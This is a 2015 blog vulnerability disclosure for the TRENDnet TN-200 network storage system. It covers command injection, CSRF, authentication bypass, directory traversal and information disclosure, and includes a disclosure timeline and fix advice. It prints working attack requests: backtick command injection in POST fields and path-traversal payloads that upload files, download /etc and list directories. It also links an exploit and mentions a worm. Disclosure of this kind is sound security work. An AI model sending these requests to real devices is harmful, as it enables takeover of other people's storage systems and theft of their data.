Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1629 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1629), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allows an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP.

Details
All HTML forms severed by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

1 comment:

  1. Firmware 1.04 available on trendnet.com download page.

    ReplyDelete